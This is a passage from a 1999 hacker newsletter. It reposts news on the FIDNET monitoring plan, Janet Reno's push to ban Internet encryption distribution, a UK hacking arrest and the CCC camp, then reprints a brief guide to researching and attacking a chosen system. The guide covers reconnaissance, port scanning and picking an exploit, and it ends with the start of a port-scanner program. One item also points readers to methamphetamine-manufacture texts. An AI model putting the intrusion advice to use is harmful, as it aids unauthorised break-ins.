  5541.       http://www.cdt.org/policy/terrorism/fidnet/
  5542.       
  5543.       ZD Net
  5544.       http://www.zdnet.com/zdnn/stories/news/0,4586,2304083,00.html
  5545.       
  5546.       MSNBC
  5547.       http://www.msnbc.com/news/294532.asp
  5548.       
  5549.       
  5550.       ZDNet;
  5551.       
  5552.       --------------------------------------------------------------
  5553.       This story was printed from ZDNN,
  5554.       located at http://www.zdnet.com/zdnn.
  5555.       --------------------------------------------------------------
  5556.       
  5557.       U.S. backs off private monitoring
  5558.       By Maria Seminerio and Margaret Kane, ZDNN
  5559.       July 28, 1999 2:26 PM PT
  5560.       URL: 
  5561.       
  5562.       With criticism rolling in from all quarters, U.S. government officials on Wednesday backed away
  5563.       from a controversial plan to monitor private-sector networks for hacking activity. 
  5564.       
  5565.       The proposed Federal Intrusion Detection Network (FIDNET) plan, details of which were revealed
  5566.       by the New York Times Wednesday, has been in the works for at least a year, a National Security
  5567.       Council spokesman told ZDNN. The proposal for the government to monitor critical systems for
  5568.       security breaches arose out of concerns about the growing vulnerability of government computer
  5569.       networks and sensitive private-sector networks to hackers, the spokesman said. (The NSC advises
  5570.       the president on national security issues.) 
  5571.       
  5572.       But in spite of indications in a government document on the plan obtained by
  5573.       the Center for Democracy and Technology -- which indicates that private
  5574.       networks would also be watched -- the NSC spokesman denied that there is
  5575.       any plan for the surveillance of private online data. 
  5576.       
  5577.       The document outlining details of the plan says the FIDNET monitoring system
  5578.       would cover "critical government and ultimately private-sector information."
  5579.       Information gathered about network security breaches within one of the plan's
  5580.       three "pillars" -- the Department of Defense computer network, other federal
  5581.       networks and private sector networks -- "would also be shared with the other
  5582.       two pillars," according to the document. 
  5583.       
  5584.       The document coalesces with comments made by Jeffrey Hunker, senior
  5585.       director for critical infrastructure at the National Security Council, at the Black
  5586.       Hat Security Conference in Las Vegas earlier this month. "We depend on
  5587.       systems that were never meant to protect data from an organized threat," he told ZDNN. "The truth
  5588.       of the matter is that you all [the industry] own the systems that are going to be the target. It is not
  5589.       the federal government systems." 
  5590.       
  5591.       However, in an interview with ZDNN, Jim Dempsey, senior staff counsel at CDT, said: "We feel
  5592.       the government should spend its resources closing the security holes that exist, rather than to watch
  5593.       people trying to break in," Jim Dempsey, senior staff counsel at CDT, said in an interview. 
  5594.       
  5595.       In spite of assurances from government officials that any monitoring would be largely automated,
  5596.       somewhere down the line a person would have to step into the process, Dempsey said -- and this is
  5597.       where such a system could be abused. 
  5598.       
  5599.       The government document detailing the plan acknowledges that "trained, experienced analysts" will
  5600.       have to step in to determine the nature of any suspected security breaches. 
  5601.       
  5602.       Looking for 'anomalous activities'
  5603.       But the NSC spokesman said the government does not plan to monitor private networks or read
  5604.       e-mail messages, but rather to "look for anomalous activities" such as evidence of denial of service
  5605.       attacks on military and other government networks. 
  5606.       
  5607.       This was little comfort to civil libertarians and other high-tech industry watchers, who blasted the
  5608.       plan as an Orwellian attack on privacy. 
  5609.       
  5610.       "I think this is a very frightening proposal," said Barry Steinhardt, associate director of the American
  5611.       Civil Liberties Union, in an interview. "The FBI has abused its power in the past to spy on political
  5612.       dissenters. This type of system is ripe for abuse," Steinhardt said. 
  5613.       
  5614.       "I think the threats (of network vulnerability) are completely overblown," said David Sobel, general
  5615.       counsel at the Electronic Privacy Information Center, in an interview. The perceived security threat
  5616.       is leading to "a Cold War mentality" that threatens ordinary citizens' privacy, Sobel said. 
  5617.       
  5618.       "The most serious concern about this is that it could move us closer to a surveillance society," said
  5619.       Ed Black, president of the Computer and Communications Industry Association, in an interview. "It's
  5620.       critical that if they do this, they should not retain any of the information that is gathered." 
  5621.       
  5622.       ZDNN's Robert Lemos contributed to this report.
  5623.       
  5624.       -=-
  5625.       MSNBC
  5626.       
  5627.       U.S. backs off private monitoring
  5628.       Under attack for its æCold War mentality,Æ the U.S. denies it plans to
  5629.       monitor private networks
  5630.                                         By Maria Seminerio and Margaret Kane
  5631.                                                                        ZDNN
  5632.  
  5633.       July 28 ù With criticism rolling in from all quarters,
  5634.       U.S. government officials on Wednesday backed
  5635.       away from a controversial plan to monitor
  5636.       private-sector networks for hacking activity
  5637.       
  5638.           THE PROPOSED FEDERAL INTRUSION Detection
  5639.      Network (FIDNET) plan has been in the works for at least a
  5640.      year, a National Security Council spokesman told ZDNN.
  5641.      The proposal for the government to monitor critical systems
  5642.      for security breaches arose out of concerns about the
  5643.      growing vulnerability of government computer networks and
  5644.      sensitive private-sector networks to hackers, the spokesman
  5645.      said. (The NSC advises the president on national security
  5646.      issues.)
  5647.             But in spite of indications in a government document on
  5648.      the plan obtained by the Center for Democracy and
  5649.      Technology ù which indicates that private networks would
  5650.      also be watched ù the NSC spokesman denied that there is
  5651.      any plan for the surveillance of private online data. 
  5652.             The document outlining details of the plan says the
  5653.      FIDNET monitoring system would cover ôcritical government
  5654.      and ultimately private-sector information.ö Information
  5655.      gathered about network security breaches within one of the
  5656.      planÆs three ôpillarsö ù the Department of Defense
  5657.      computer network, other federal networks and private sector
  5658.      networks ù ôwould also be shared with the other two
  5659.      pillars,ö according to the document. 
  5660.             ôWe feel the government should spend its resources
  5661.      closing the security holes that exist, rather than to watch
  5662.      people trying to break in,ö Jim Dempsey, senior staff counsel
  5663.      at CDT, said in an interview. 
  5664.             In spite of assurances from government officials that
  5665.      any monitoring would be largely automated, somewhere
  5666.      down the line a person would have to step into the process,
  5667.      Dempsey said ù and this is where such a system could be
  5668.      abused. 
  5669.  
  5670.             The government document detailing the plan
  5671.      acknowledges that ôtrained, experienced analystsö will have
  5672.      to step in to determine the nature of any suspected security
  5673.      breaches. 
  5674.             But the NSC spokesman said the government does not
  5675.      plan to monitor private networks or read e-mail messages, but
  5676.      rather to ôlook for anomalous activitiesö such as evidence of
  5677.      denial of service attacks on military and other government
  5678.      networks. 
  5679.             This was little comfort to civil libertarians and other
  5680.      high-tech industry watchers, who blasted the plan as an
  5681.      Orwellian attack on privacy. 
  5682.  
  5683.            ôI think this is a very frightening proposal,ö said Barry
  5684.      Steinhardt, associate director of the American Civil Liberties
  5685.      Union, in an interview. ôThe FBI has abused its power in the
  5686.      past to spy on political dissenters. This type of system is ripe
  5687.      for abuse,ö Steinhardt said. 
  5688.             ôI think the threats (of network vulnerability) are
  5689.      completely overblown,ö said David Sobel, general counsel at
  5690.      the Electronic Privacy Information Center, in an interview.
  5691.      The perceived security threat is leading to ôa Cold War
  5692.      mentalityö that threatens ordinary citizensÆ privacy, Sobel
  5693.      said. 
  5694.             ôThe most serious concern about this is that it could
  5695.      move us closer to a surveillance society,ö said Ed Black,
  5696.      president of the Computer and Communications Industry
  5697.      Association, in an interview. ôItÆs critical that if they do this,
  5698.      they should not retain any of the information that is
  5699.      gathered.ö 
  5700.       
  5701.       @HWA
  5702.       
  5703. 34.0 Lawmakers Want Drug Info Off the Net 
  5704.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  5705.  
  5706.       From HNN http://www.hackernews.com/
  5707.       
  5708.       contributed by St0n3r 
  5709.       First it was bomb making information; now it is drug
  5710.       making information. The dominoes are falling. Sen. Orrin
  5711.       Hatch, R-Utah, is sponsoring a large
  5712.       anti-methamphetamine bill, one section of which may
  5713.       ban this type of information from the Internet. 
  5714.  
  5715.       Nando Times
  5716.  
  5717.       Better grab the information now while you still can.
  5718.       Textfiles.com - via Attrition.org
  5719.       http://www.attrition.org/~modify/texts/mirrors/textfiles.com/drugs/
  5720.       
  5721.       Secrets of Methamphetamine Manufacture; Including Recipes for Mda, Ecstacy, and Other Psychedelic
  5722.       Amphetamines - Via Amazon.com
  5723.       http://www.amazon.com/exec/obidos/ASIN/1559501448/thehackernewsnet
  5724.       
  5725.       The Construction and Operation of Clandestine Drug
  5726.       Laboratories - via Amazon.com      
  5727.       http://www.amazon.com/exec/obidos/ASIN/1559501081
  5728.       
  5729.       @HWA
  5730.       
  5731.       
  5732. 35.0 Reno Wants Inet Crypto Banned 
  5733.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5734.      
  5735.       From HNN http://www.hackernews.com/
  5736.  
  5737.       contributed by Arik 
  5738.       Janet Reno, Attorney General for the United States, has
  5739.       called for an outright ban on the distribution of
  5740.       cryptography on the internet. She made statements to
  5741.       this effect in a letter she sent last May to German
  5742.       Federal Secretary of Justice Herta Daeubler-Gmelin. The
  5743.       attorney general's comments take her recent
  5744.       congressional testimony against the Security and
  5745.       Freedom through Encryption (SAFE) Act, H.R. 850, one
  5746.       step farther. 
  5747.  
  5748.       Telepolis- German
  5749.       http://www.heise.de/tp/deutsch/inhalt/te/5117/1.html
  5750.       
  5751.       Newsbytes
  5752.       http://www.newsbytes.com/pubNews/99/134030.html
  5753.       
  5754.       JYA.com      
  5755.       http://jya.com/reno-ban.htm
  5756.       
  5757.       
  5758.       Newsbytes;
  5759.       
  5760.       Reno Calls For Ban Of Encryption Products On The Net 
  5761.  
  5762.       By Staff, Newsbytes
  5763.       WASHINGTON, DC, U.S.A., 
  5764.       28 Jul 1999, 5:16 PM CST
  5765.  
  5766.       Attorney General Janet Reno, long-known for her opposition to the export of strong encryption products, has called for an
  5767.       outright ban of the distribution of such software via the Internet, according to a German publication. 
  5768.  
  5769.       The German magazine Telepolis printed what it said was a letter Reno sent last May to German Federal Secretary of
  5770.       Justice Herta Daeubler- Gmelin. The letter calls for the addressing of "risks posed by electronic distribution of encryption
  5771.       software." 
  5772.  
  5773.       "Although the Wassenaar Nations have now reached agreement to control the distribution of mass market encryption
  5774.       software of certain cryptographic strength," Reno wrote, "some Wassenaar Nations continue not to control encryption
  5775.       software that is distributed over the Internet, either because the software is in the `public domain' or because those nations
  5776.       do not control distribution of intangible items." 
  5777.  
  5778.       "While I recognize that this issue is controversial, unless we address this situation, use of the Internet to distribute
  5779.       encryption products will render Wassenaar's controls immaterial," Reno concluded in the letter. 
  5780.  
  5781.       The 1996 Wassenaar Arrangement restricts the export of high-tech equipment that can be used for military purposes to
  5782.       countries of proliferation concern, like Iran, Iraq and Libya. 
  5783.  
  5784.       Reno's letter came as a "thank you" to Daeubler-Gmelin's and Germany's efforts to "achieve a fair resolution on encryption
  5785.       products" at a Wassenaar plenary session last December. 
  5786.  
  5787.       (Note: Translation of the letter provided by NY Architects, http://jya.com ) 
  5788.  
  5789.       Reno's proposal, if enacted eventually, would mean the end of Internet-enabled distribution of all software products using
  5790.       encryption, including highly popular Web browsers from companies like America Online's Netscape and Microsoft. Any
  5791.       communications products using encryption would also be banned from Internet distribution. 
  5792.  
  5793.       The attorney general's comments take her recent congressional testimony against the Security and Freedom through
  5794.       Encryption (SAFE) Act, H.R. 850, one step farther. 
  5795.  
  5796.       SAFE's intent is to allow the widespread availability of strong encryption for export. Specifically, the bill would relax the
  5797.       White House's controls on encryption export policy, and would make strong encryption products available in the US mass
  5798.       market available for export. H.R. 850 would also extend the relaxation of policies to other encryption-related computer
  5799.       products. 
  5800.  
  5801.       In testimony earlier this month before the House Armed Services Committee, Reno restated an earlier claim that while
  5802.       encryption provides many important benefits to society, "the good of society requires narrow exceptions to this normal
  5803.       expectation of privacy." 
  5804.  
  5805.       Reno also predicted crime prevention would become much more difficult if the bill is passed, because the process to
  5806.       unscramble encrypted messages without the recovery key would be very complex. 
  5807.  
  5808.       "That, to me, is an unacceptable result, and we must not allow it to happen," Reno added. 
  5809.  
  5810.       Reno also asked for support and funding of a centralized technical resource - "a `Technical Support Center,'" as Reno called
  5811.       it - within the Federal Bureau of Investigation (FBI). Such a center would support federal, state and local law enforcement in
  5812.       developing tools and techniques to respond to public threats caused by terrorists and criminals who use encryption. 
  5813.  
  5814.       Reported By Newsbytes.com, http://www.newsbytes.com . 
  5815.  
  5816.       17:16 CST 
  5817.       
  5818.       -=-
  5819.       
  5820.       JYA.com      
  5821.       http://jya.com/reno-ban.htm
  5822.       
  5823.       27 July 1999. Thanks to CS-H and Telepolis. Translation by JYA with Systran.
  5824.       Source: http://www.heise.de/tp/deutsch/inhalt/te/5117/1.html 
  5825.       
  5826.       
  5827.       
  5828.       TELEPOLIS, 27 July 1999 
  5829.       
  5830.       The USA urges ban of encryption products on the Internet 
  5831.       
  5832.       Janet Reno pressures Herta DΣubler-Gmelin 
  5833.       
  5834.       By Christiane Schulzki-Haddouti   
  5835.       
  5836.       The Federal Cabinet ended the smoldering uncertainties in the German encryption policy at the beginning of June with publication of five key points. However, the
  5837.       encryption debate is not ended. In the next year a further Wassenaar round of negotiations will be on the table. The US is already trying now to persuade changes in
  5838.       positions. For the US the liberal export politics of the Europeans is a thorn in the eye. It therefore tries to close the last gaps. 
  5839.       
  5840.       At the end of May US Attorney General Janet Reno requested in a letter (below) that Federal Secretary of Justice Herta DΣubler-Gmelin control distribution of coding
  5841.       software which is becoming common "over the Internet." In addition it also positions "Public Domain" products. Reno's view is that the "use of the Internet to distribute
  5842.       encryption products will render Wassenaar's controls immaterial." At the end of year 2000 the Wassenaar agreement is to be negotiated; it regulates among other things
  5843.       the export of encyption products. Until then the USA wants with the 33 Wassenaar member states to develop a broad consent. 
  5844.       
  5845.       It is strange that the letter was addressed to the Federal Department of Justice and not to the Federal Ministry for Economic Affairs, which, together with the Federal
  5846.       Ministry of the Interior, is responsible for encryption policy. The Americans probably well-know that the responsibilities are distributed within the German Federal
  5847.       Government. Therefore it is to be accepted that they figure a discussion with the Ministry of Justice has a larger chance of success. 
  5848.       
  5849.       The Federal Department of Justice did not want to confirm to Telepolis the existence of the letter. From the outside the ministry it means, however, it already has given
  5850.       several letters of the same request. It is now working on a letter in reply. However, it is not well-known whether the answer to Reno's unjustified demand is to fail. Arne
  5851.       Brand of the virtual local association of the SPD is annoyed about the "concealment policy" of the Federal Government: 
  5852.       
  5853.            "a cover broad I nevertheless only over a thing out, if I do not have an own point of view, but me the line of others to attach would like". 
  5854.       
  5855.       Encryption export policy as politico-economic instrument 
  5856.       
  5857.       Also, Hubertus Soquat, adviser in the Federal Ministry for Economic Affairs, did not want to confirm the existence of the letter; he nevertheless referred Telepolis to
  5858.       the basis of the encyryption benchmark figures adopted by the cabinet as clearly a position: "possibly the demand" the American placed into that the area to adjust in the
  5859.       future also encryption products in the "Public Domain" category to counter German encryption policy, which is based on the free availability of encryption products. 
  5860.       
  5861.       The free availability covers the range from development up to use by the user. The Federal Government cannot therefore meet "possible American demands." Soquat is
  5862.       convinced of the fact that "encryption export policy is being handled as a politico-economic instrument of the USA, at least." 
  5863.       
  5864.       Thomas Roessler, spokesperson of the "Foerdervereins information technology and society " (FITUG), sees the Reno letter as an attempt to keep "electronic interception
  5865.       capabilities of American and allied authorities in force for as long as possible." He says that such export control would have absurd consequences: 
  5866.       
  5867.            "A computer journal, which contains a supplement CD-ROM on free cryptographic software, might not be sold at the kiosk anymore, or only by license to
  5868.            certain foreign customers. Also the publication of free cryptographic software for general access over the Internet would no longer be easily possible." 
  5869.       
  5870.       Besides, says Roessler, already the 1998 results of negotiation would contradict which cryptographic mass market software to export control, the actual purpose of the
  5871.       Wassenaar agreement. This consists of contributing "to regional and international security and stability as transparency and larger responsibility with the transfer by
  5872.       conventional weapons and dual-use goods and - technologies promoted and thereby destabilizing accumulations of such - goods and weapons are prevented." Besides
  5873.       "bona fide" civilian transactions are not to be obstructed. Roessler: 
  5874.       
  5875.            "Today, the use of strong cryptography is the best course of action, it interacts with the controlled transactions obviously in bona fide civil transactions. 
  5876.       
  5877.       The conception that an internationally destabilizing imbalance of military strength can be caused by free or mass market available encryption software, is "absurd."
  5878.       Reno's letter has to do nothing with the avowed goals of the Wassennaar agreement, "however, but with the attempt to keep in force the electronic surveillance
  5879.       capabilities of American and allied authorities," says Roessler. 
  5880.       
  5881.       Based on information of the "Electronics Frontiers Australia " (EFA) the export of "Public Domain" crypto software is already now forbidden in Australia, the USA,
  5882.       New Zealand, France and Russia, since these states do not use "the general software note" of the Wassenaar agreement. A reason is not well-known the EFA. Ingo
  5883.       Ruhmann of the "forum computer scientist inside for peace and social responsibility " (FifF) regards the attempt of Reno to subject encyption systems of stronger control
  5884.       as "thoughtless handling of essential fundamental rights of democratic states." 
  5885.       
  5886.       Already it is now foreseen that the "general software note" will play a central role in the Wassenaar preliminaries. An avowed goal of the USA is to prevent the
  5887.       download of encryption programs over the Internet. Also the treatment of "Public Domain" encryption software will be a topic. Still there are arguments about the
  5888.       definition of the term "Public of Domain." The Wassenaar agreement describes it as software which was made available "without restrictions on its further distribution."
  5889.       From a legal view it designates, however, goods, which are free from copyright rights. Critically: According to the wording it is sufficient to exclude a further spread on
  5890.       CD or without documentation so that a software no more than is not regarded "into the public domain." Is looked for now a definition for a product, which is everyone
  5891.       accessible and freely available. 
  5892.       
  5893.       
  5894.       
  5895.       Source: http://www.heise.de/tp/deutsch/inhalt/te/5117/2.html 
  5896.       
  5897.       Federal Secretary of Justice Herta DΣubler-Gmelin at the end of May 
  5898.       
  5899.       Dear Minister DΣubler-Gmelin: 
  5900.       
  5901.       I wish to thank you and your Government for your efforts to achieve a fair resolution regarding multilateral export controls on encryption products at the recent
  5902.       Wassenaar plenary session on December 2-3, 1998. While no Nation, including the United States, was completely satisfied, I think we made significant progress toward
  5903.       a regime that can support the interests of national security and public safety in the face of the challenges posed by the increasing use of encryption internationally. Given
  5904.       the divergent cryptography policies that the Wassenaar Nations have supported in the past, and the continuing controversy that cryptography policy continues to
  5905.       generate, that 33 Nations managed to find common ground augurs well for our future ability to find solutions that satisfy the divergent needs of privacy, electronic
  5906.       commerce, national security, and public safety. 
  5907.       
  5908.       Much work remains to be done. In particular, I believe we must soon address the risks posed by electronic distribution of encryption software. Although the Wassenaar
  5909.       Nations have now reached agreement to control the distribution of mass market encryption software of certain cryptographic strength, some Wassenaar Nations
  5910.       continue not to control encryption software that is distributed over the Internet, either because the software is in the "public domain" or because those Nations do not
  5911.       control distribution of intangible items. While I recognize that this issue is controversial, unless we address this situation, use of the Internet to distribute encryption
  5912.       products will render Wassenaar's controls immaterial. 
  5913.       
  5914.       I look forward to our continuing discussions on these and other issues. And again, thank you for your past and future considerations of these issues. 
  5915.       
  5916.       Sincerely, Janet Reno 
  5917.       
  5918.       Source is the editors at JYA
  5919.       
  5920.       @HWA
  5921.  
  5922. 36.0 CCC Camp Happens Next Weekend 
  5923.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5924.  
  5925.      From HNN http://www.hackernews.com/
  5926.      
  5927.       contributed by TurTleX and tacscan 
  5928.       In an open field next to a lake near Altlandsberg,
  5929.       outside Berlin, Germany several thousand people are
  5930.       expected to gather under tents with their computers.
  5931.       The Chaos Computer Club Camp will be taking place next
  5932.       weekend. Along with things like a 34MBit Internet link,
  5933.       discussions on cryptography and the Linux Death Match
  5934.       one of the scheduled events may be underwater lock
  5935.       picking. 
  5936.  
  5937.       Industry Standard
  5938.       http://www.thestandard.net/articles/display/0,1449,5672,00.html?home.tf
  5939.       
  5940.       Computer World
  5941.       http://www.computerworld.com/home/news.nsf/all/9907272hackhol
  5942.       
  5943.       HNN Cons Page
  5944.       http://www.hackernews.com/cons/cons.html
  5945.       
  5946.       Industry Standard;
  5947.       
  5948.            
  5949.  
  5950.                                      July 27, 1999   
  5951.  
  5952.  
  5953.  
  5954.  
  5955.       Chaos Club Takes Hackers on
  5956.       Holiday 
  5957.  
  5958.       By Mary Lisbeth D'Amico 
  5959.  
  5960.       MUNICH û Hackers looking to get away from
  5961.       it all and at the same time hone their skills,
  5962.       will set up tents in a field near Berlin next
  5963.       week as part of a three-day event
  5964.       sponsored by Germany's premier hacker
  5965.       group, the Chaos Computer Club. 
  5966.  
  5967.       "Nerds, hackers and phreaks from around the
  5968.       world," as the club calls them, are gathering
  5969.       Aug. 6 through 8 in Altlandsberg, near Berlin,
  5970.       where they will split their time between
  5971.       partying, swimming in a nearby lake and
  5972.       engaging in contests that test their hacking
  5973.       prowess. 
  5974.  
  5975.       The club will provide electricity and Ethernet
  5976.       access in every tent. A special network will
  5977.       be set up so users can practice and hook up
  5978.       to the Net. 
  5979.  
  5980.       Although press is allowed, journalists must
  5981.       be on their best behavior, the club says.
  5982.       Reporters must pay like everyone else, must
  5983.       wear a badge clearly identifying themselves,
  5984.       may not take pictures and may only quote
  5985.       those who consent to be interviewed. 
  5986.  
  5987.       Pre-registration is already closed for the
  5988.       event, according to the club Web site, but
  5989.       those that show up with 150 marks (US$82)
  5990.       can try their luck. The grounds can
  5991.       comfortably fit between 1,500 and 2,000
  5992.       people. 
  5993.  
  5994.       Business visitors û defined by a club
  5995.       publication as anyone who is "rich or working
  5996.       for a company or government that wants
  5997.       you at the camp because there is a lot to
  5998.       learn or you have a certain commercial
  5999.       interest," are asked to pay 1,500 marks
  6000.       (US$820). Spaces remain for this type of
  6001.       participant. 
  6002.  
  6003.       The camp will be divided into theme villages
  6004.       û including lock picking, cryptography and
  6005.       re-engineering û where participants can
  6006.       choose the topic that most interests them.
  6007.       A typical event will be the Linux
  6008.       Deathmatch, a real-time hacking competition
  6009.       in which teams of one to three players will
  6010.       try to hack one another. 
  6011.  
  6012.       Participants can also propose their own
  6013.       topics to the event's sponsors. One group
  6014.       has also announced a "Hack the NT"
  6015.       contest, and the lock-pickers' project is
  6016.       even eyeing "underwater lock picking in the
  6017.       lake nearby." 
  6018.  
  6019.       Mary Lisbeth D'Amico writes for the IDG
  6020.       News Service 
  6021.      
  6022.       -=-
  6023.       
  6024.       Computer World
  6025.       http://www.computerworld.com/home/news.nsf/all/9907272hackhol
  6026.       
  6027. 37.0 Computer Criminal Busted in UK 
  6028.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  6029.      
  6030.      From HNN http://www.hackernews.com/
  6031.  
  6032.       contributed by tacscan 
  6033.       A UK man has been arrested and released on bail for
  6034.       allegedly breaking into the computers of the
  6035.       CurrantBun.Com Web site. The arrest was conducted by
  6036.       members of the Computer Crime Unit based at New
  6037.       Scotland Yard. CurrantBun.com is the portal of Britain's
  6038.       most popular newspaper, The Sun. After the break-in
  6039.       the personal information of over 50 people was
  6040.       distributed via the internet. 
  6041.  
  6042.       The Register      
  6043.       http://www.theregister.co.uk/990726-000006.html
  6044.       
  6045.       Posted 26/07/99 1:57pm by Tim Richardson
  6046.  
  6047.       Man arrested over alleged hacking offence
  6048.     
  6049.       A 19-year-old man has been arrested in connection with the alleged hacking of a Web site
  6050.       owned by a Wapping-based business premises. 
  6051.     
  6052.       The man -- who has not been named by police -- was arrested last Wednesday and
  6053.       released without charge. He was bailed to appear at Holborn Police Station in October
  6054.       pending further investigations. 
  6055.     
  6056.       It is understood the arrest was part of a special operation conducted by the Computer
  6057.       Crime Unit based at New Scotland Yard. 
  6058.     
  6059.       Last month the CurrantBun.Com Web site was hacked and the personal details of 50
  6060.       people were published on the Net. 
  6061.     
  6062.       CurrantBun.com is the portal of Britain's most popular newspaper The Sun which is based
  6063.       at Wapping, London. 
  6064.     
  6065.       David Habanec claimed responsibility for the alleged break-in at CurrantBun.com. 
  6066.     
  6067.       At the time he made no secret that he was responsible and went out of his way to court
  6068.       publicity over the alleged intrusion. 
  6069.     
  6070.       He even published details of how he carried out the breach of security. 
  6071.     
  6072.       In an exclusive interview with The Register Habanec said he did it to gain notoriety among
  6073.       the Internet community. He also alleged it was part of a revenge attack against
  6074.       Cheshire-based ISP Telinco, the company that provides the network for CurrantBun.Com.
  6075.       « 
  6076.       
  6077.       @HWA 
  6078.  
  6079. 38.0 Researching an attack (KeyRoot)
  6080.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6081.      
  6082.      From http://www.pure-security.net/
  6083.            
  6084.                 ____     ______  __  ___  _____    ____             __________
  6085.           /   /    /  ___/  \ \/  / /     \  /    \    ____   /___   ___/
  6086.          /   /__  /  /__     \   / /  <>  / /  __  \  /    \     /  / 
  6087.         /   ___/ /   __/     /  / /     _/  \      / /  __  \   /  /
  6088.        /    \   /   /__     /  / /  /\  \    \____/  \      /   \  \
  6089.       /__/\__\  \_____/    /__/  \_/  \__\            \____/     \__\
  6090.       
  6091.       http://www.weownyourlives.forever
  6092.       
  6093.       
  6094.       RESEARCHING AN ATTACK by Mnemonic
  6095.       xkyller@hotmail.com
  6096.       7/27/99
  6097.       
  6098.       =-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=
  6099.        KeyRoot KeyRoot KeyRoot KeyRoot KeyRoot KeyRoot
  6100.       =-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=
  6101.       
  6102.       Contents:
  6103.       
  6104.       01 - Intro
  6105.       02 - Web browsing
  6106.       03 - Port scanning
  6107.       04 - Determing the method of penetration
  6108.       05 - Making the attack
  6109.       06 - Ok that's it
  6110.       
  6111.       =-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=
  6112.       Shouts to GRiDMAN for suggesting the topic to me
  6113.       =-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=
  6114.       
  6115.       01 - Intro
  6116.       
  6117.               I don't know why it wasn't obvious for me to write about it earlier.
  6118.       Although I'm sure the major audience that will continue reading after the
  6119.       intro are script kiddies, I thought about it for a while and decided to go
  6120.       ahead with releasing it.  This white paper is geared towards people who want
  6121.       to single out a system and make an organized attack.  Rather than attacking
  6122.       a random system you found to be exploitable to a certain security flaw.  I
  6123.       hope I can be of some help to new security professionals or other hacker-type
  6124.       people or anyone else who breaks into systems.  When you plan on breaking
  6125.       into someone else's system just plan on paying the consequences if you get
  6126.       caught.  If you don't want to get caught take the necessary precautions.
  6127.       You still might get caught.
  6128.       
  6129.       =-=-=-=-=-=-=-=-=-=
  6130.       
  6131.       02 - Web browsing
  6132.       
  6133.               After you know what system you're attacking you have to get some
  6134.       general information about the system like what platform are they running,
  6135.       what applications, things like that.  A lot of times you can do this just
  6136.       by looking through their site.  As you look through the take note of what
  6137.       it's running like if it says what operating system, what web server,
  6138.       firewall, administrative tools, or CGI scripts and remember what versions
  6139.       are being used either.  The difference between version 1.0 and 3.0 can be
  6140.       the difference between a possible attack and no attack.  FTP or telnet
  6141.       banners could also reveal information about the system.
  6142.       
  6143.       =-=-=-=-=-=-=-=-=-=
  6144.       
  6145.       03 - Port scanning
  6146.       
  6147.               Port scanning is always a good idea whether you know anything at
  6148.       all about the system or not.  The results of a port scan can in many
  6149.       cases show you what operating system is being run.  For example a Unix
  6150.       machine wouldn't be running NetBIOS and an NT machine wouldn't be running
  6151.       mountd.  In addition to this, what Internet applications are being run
  6152.       provides different ways you can break in.  Like if you know that the
  6153.       system is Linux and is running qpop or nlock or some other exploit-able
  6154.       program then there's a possibility that you can penetrate the system that
  6155.       way.  You should keep a temporary log of all port scanning that you do so
  6156.       that you can use the information when you actually make your attack.  Here
  6157.       is an example of a very short port scan:
  6158.       
  6159.       KeyRoot Port Scanner (KeyScan) v1.0 by Mnemonic
  6160.       
  6161.       Scanning ip address 127.0.0.1 on ports 21, 23, 56
  6162.       
  6163.       Scan started 3/6/2020 1:08 am
  6164.       
  6165.       127.0.0.1
  6166.         21
  6167.         23
  6168.       
  6169.       Scan completed 3/6/2020 1:10 am
  6170.       
  6171.       KeyRoot owns you
  6172.       
  6173.       I just scanned three ports on my local machine.  Two of these ports were
  6174.       open (21 and 23).  I can pretty much assume that I am running FTP and telnet.
  6175.       Other types of scans can determine what applications are being run on
  6176.       specific ports.
  6177.       
  6178.       =-=-=-=-=-=-=-=-=-=
  6179.       
  6180.       04 - Determining the method of penetration
  6181.       
  6182.               Now you should know just about everything you need in order to make
  6183.       an attack.  When you know what the system is running you basically know what
  6184.       it's vulnerable to.  You can run some publicly-available exploit, write your
  6185.       own exploit, or use publicly-known attacks to penetrate the system.  In many
  6186.       instances a system may be running programs that are exploitable only when
  6187.       you have an account on the system.  If that's the case you're going to need
  6188.       to get a shell some how like guessing someone's password or something like
  6189.       that.  Rooting the system means you have complete control over it.  You have
  6190.       administrator rights.
  6191.       
  6192.       =-=-=-=-=-=-=-=-=-=
  6193.       
  6194.       05 - Making the attack
  6195.       
  6196.               Ok so now you know how to attack the system go do it.  In most cases
  6197.       when you're attacking a someone you need to be running the same platform as
  6198.       they are.  This isn't the case with null connections or with platform-to-
  6199.       anotherplatform exploits.
  6200.       
  6201.       =-=-=-=-=-=-=-=-=-=
  6202.       
  6203.       06 - Ok that's it
  6204.       
  6205.               Ummmm... yeah... peace to all my bro's in on EFNet.  NtWaK0 and
  6206.       MostHateD and everyone else.
  6207.       
  6208.       =-=-=-=-=-=-=-=-=-=
  6209.       
  6210.       KeyRoot: living your life for you
  6211.       
  6212.       =-=-=-=-=-=-=-=-=-=
  6213.       
  6214.       07 - KeyScan.c
  6215.       
  6216.       -----cut-----
  6217.       
  6218.       /*  KeyScan.c by Mnemonic is just a very simple port scanner
  6219.            ____     ______  __  ___  _____    ____             __________
  6220.           /   /    /  ___/  \ \/  / /     \  /    \    ____   /___   ___/
  6221.          /   /__  /  /__     \   / /  <>  / /  __  \  /    \     /  / 
  6222.         /   ___/ /   __/     /  / /     _/  \      / /  __  \   /  /
  6223.        /    \   /   /__     /  / /  /\  \    \____/  \      /   \  \
  6224.       /__/\__\  \_____/    /__/  \_/  \__\            \____/     \__\
  6225.       
  6226.       For Linux/FreeBSD
  6227.       */
  6228.       
  6229.       #include <netdb.h>
  6230.       #include <netinet/in.h>
  6231.       #include <stdio.h>
  6232.       #include <string.h>
  6233.       #include <sys/socket.h>
  6234.       #include <sys/types.h>
  6235.       
  6236.       #define p0rt putaportnumberherethatyouwanttocheck
  6237.       
  6238.       int x, s;
  6239.       char *str = "KeyScan v1.0 by Mnemonic";
  6240.       struct sockaddr_in addr, spoofedaddr;
  6241.       struct hostent *host;
  6242.       
  6243.       
  6244.       int openthesock(int sock, char *target, int port) {
